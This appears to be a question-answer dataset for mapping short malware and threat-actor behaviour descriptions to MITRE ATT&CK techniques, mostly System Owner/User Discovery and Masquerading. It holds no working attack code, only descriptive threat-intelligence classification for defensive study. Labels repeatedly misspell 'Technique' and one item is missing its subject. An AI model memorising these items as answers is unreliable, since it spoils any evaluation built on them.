+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT collects the username from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Felismus collects the current username and sends it to the C2 server.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has been used to run the whoami command on the system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy enumerates the current user during the initial infection.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream has the ability to gather user information from the targeted system using `whoami/upn&whoami/fqdn&whoami/logonid&whoami/all`.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer obtains the current user's security identifier.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium has the ability to distinguish between a standard user and an administrator on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Get2 has the ability to identify the current username of an infected host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to enumerate the infected system's user name.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can collect the username from the victim's machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT collects the victim username along with other account information (account type, description, full name, SID and status).","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can identify the user id on a target machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: can collect the victim user name.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAWKBALL can collect the user name of the system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to collect the username on the infected host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole lists local users and session information.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe collects the username from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can obtain the victim user name.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI can collect the username from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK can conduct basic network reconnaissance on the victim machine with `whoami`, to get user details.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar gathers information on users.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can identify logged in users across the domain and views user sessions.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The OsInfo function in Komplex collects the current running username.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects registered owner details by using the commands systeminfo and net config workstation.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linux Rabbit opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke can enumerate the account name on a targeted system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LitePower can determine if the current user has admin privileges.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can collect the username from the system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has the ability to discover the username on the infected host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer has the ability to identify the username on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa can collect the username from the compromised machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can collect the username from a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can retrieve the victim’s username.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MechaFlounder has the ability to identify the username and hostname on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has collected the username from the victim's machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia collects the username from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can identify users registered to a targeted machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MirageFox can gather the username from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type runs tests to determine the privilege level of the compromised user.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind obtains the victim username.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs has the capability to gather the username from the victim's machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito runs whoami on the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NBTscan can list active users on the system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NDiskMonitor obtains the victim username and encrypts the information to send over its C2 channel.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NGLite will run the whoami command to gather system information and return this to the command and control server.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI can collect the username from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanHaiShu collects the username from the victim.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Neoichor can collect the user name from a victim's machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT can check for blocklisted usernames on infected endpoints.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus can collect the username from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum can collect the victim username.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS has the ability to identify the username on the compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER may collect information about the currently logged in user by running whoami on a victim.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT sent username, computer name, and the previously generated UUID in reply to a ""who"" command from C2.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke has commands to get the current user's name and SID.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower has the ability to identify the current user on the infected host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A module in Prikormka collects information from the victim about the current user name.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can enumerate local information for Linux hosts and find currently logged on users for Windows hosts.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PyDCrypt has probed victim machines with whoami and has collected the username from the machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT gathers the victim username.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can identify the user name on a compromised system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can enumerate the username and account type.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA runs the whoami and query user commands.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can gather system owner information, including user and administrator privileges.","Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RGDoor executes the whoami on the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can collect the username from a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can obtain the victim username and permissions.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reaver collects the victim's username.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves can obtain information about the logged on user both locally and for Remote Desktop sessions.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec can obtain information about the current user.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT gathers the username from the system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rifdoor has the ability to identify the username on the compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun can detect the username of the infected host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin collects the victim’s username and whether that user is an admin.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type has run tests to determine the privilege level of the compromised user.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to identify the user on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHARPSTATS has the ability to identify the username on the compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can gather a list of logged on users.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has collected the username from a victim machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has used whoami commands to identify system owners.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE can gather the username from an infected host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST collected the username from a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can collect the username from an infected host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot can collect the username from a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper will attempt to enumerate the username of the victim.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has collected the username of the victim system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist can collect the username on a targeted system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve can obtain the id of a logged in user.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish can use `whoami` to obtain the username from a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SodaMaster can identify the username on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can execute getinfo to identify the username on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Spark has run the whoami command and has a built-in command to identify the user logged in.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp uses the whoami command.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle can collect the user name from a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SslMM sends the logged-on username to its hard-coded C2.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater can collect the user name from the victim's machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck gathers user names from infected hosts.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sys10 collects the account name of the logged-in user and sends it to the C2.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can collect the username from a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: T9000 gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can identify the user and groups the user belongs to on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can gather information about the user on a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can retrieve usernames.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UPPERCUT has the capability to collect the current logged on user’s username from a machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Unknown Logger can obtain information about the victim usernames.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN gathers the username from the victim’s machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can gather information regarding the user.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WINDSHIELD can gather the victim user name.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WINERACK can gather information on the victim username.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMail can identify the current username on the victim system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can collect the username on the victim machine to send to C2.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WinMM uses NetUser-GetInfo to identify that it is running under an “Admin” account on the local system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can retrieve a list of user accounts and usernames from an infected machine.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XAgentOSX contains the getInfoOSX function to return the OS X version as well as the current user.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy gets the username from the system.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can collect the owner and organization information from the target workstation.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ can collect the username from a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can collect the username from a compromised host.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT enumerates the current user during the initial infection.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty collects the victim’s username.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: zwShell can obtain the name of the logged-in user on the victim.,"Tecnique: T1033 System Owner/User Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.","Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, AvosLocker was disguised using the victim company name as the filename.","Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dust Storm, the threat actors disguised some executables as JPG files.","Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors modified the MaoCheng dropper so its icon appeared as a Word document.","Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has renamed the WinRAR utility to avoid detection.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has disguised a Cobalt Strike beacon as a Flash Installer.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has masked executables with document file icons including Word and Adobe PDF.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has created accounts disguised as legitimate backup and service accounts as well as an email administration account.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has masqueraded staged data by using the Windows certutil utility to generate fake Base64 encoded certificates with the input file.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has used several different security software icons to disguise executables.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nomadic Octopus attempted to make Octopus appear as a Telegram Messenger with a Russian interface.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used .doc file extensions to mask malicious executables.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLATINUM has renamed rar.exe to avoid detection.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team masqueraded malicious installers as Windows update packages to evade defense and entice users to execute binaries.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has masked malware DLLs as dat and jpg files.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has disguised their scripts with docker-related file names.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used icons mimicking MS Office files to mask malicious executables. Windshift has also attempted to hide executables by changing the file extension to "".scr"" to mimic Windows screensavers.","Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has spoofed legitimate applications in phishing lures and changed file extensions to conceal installation of malware.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used esentutl to change file extensions to their true type that were masquerading as .txt files.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can disguise JavaScript files as PDFs.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox has the ability to mask malicious data strings as PDF files.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Dacls Mach-O binary has been disguised as a .nib file.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate can masquerade as pirated media content for initial delivery to victims.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla's payload has been renamed `PowerShellInfo.exe`.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman has used an icon mimicking a text file to mask a malicious executable.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout has used folder icons for malicious files to lure victims into opening them.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke has attempted to mimic a compromised user's traffic by using the same user agent as the installed browser.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro can download malicious files with a .tmp extension and append them with .exe prior to execution.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb can masquerade the output of C2 commands as a fake, but legitimately formatted WebP file.","Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan has used an executable named `companycatalogue` to appear benign.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NativeZone has, upon execution, displayed a message box that appears to be related to a Ukrainian electronic document management system.","Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya drops PsExec with the filename dllhost.dat.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowGoop has disguised a PowerShell script as a .dat file (goopdate.dat).,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession has used a file named English.rtf to appear benign on victim hosts.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has been delivered as archived Windows executable files masquerading as PDF documents.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Raindrop was built to include a modified version of 7-Zip source code (including associated export names) and Far Manager source code.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
